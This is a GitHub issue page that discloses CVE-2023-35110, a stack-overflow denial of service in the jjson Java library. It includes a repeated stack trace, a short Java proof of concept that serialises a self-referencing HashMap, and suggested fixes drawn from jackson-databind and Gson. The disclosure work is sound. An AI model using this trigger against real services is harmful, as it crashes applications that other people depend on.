Headline
CVE-2023-35110: Stack overflow error caused by jjson serialization Map · Issue #2 · grobmeier/jjson
An issue was discovered jjson thru 0.1.7 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Comments
Stack overflow error caused by jjson serialization Map****Description
jjson before v0.1.7 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:87)
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:61)
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.StringEscapeUtils.escapeJava(StringEscapeUtils.java:456)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeString(JSONAnnotationEncoder.java:286)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:149)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
PoC
<dependency\>
<groupId\>de.grobmeier.json</groupId\>
<artifactId\>jjson</artifactId\>
<version\>0.1.7</version\>
</dependency\>
import de.grobmeier.jjson.JSONException; import de.grobmeier.jjson.convert.JSONAnnotationEncoder;
import java.util.HashMap;
public class PoC2 {
public static void main(String\[\] args) throws JSONException {
HashMap<String,Object\> map\=new HashMap<>();
map.put("t",map);
JSONAnnotationEncoder jsonAnnotationEncoder = new JSONAnnotationEncoder();
jsonAnnotationEncoder.encode(map);
}
}
Rectification Solution
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
References
- If the value in map is the map’s self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
- https://github.com/jettison-json/jettison/pull/53/files
1 participant
Related news
An issue was discovered jjson through 0.1.7 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.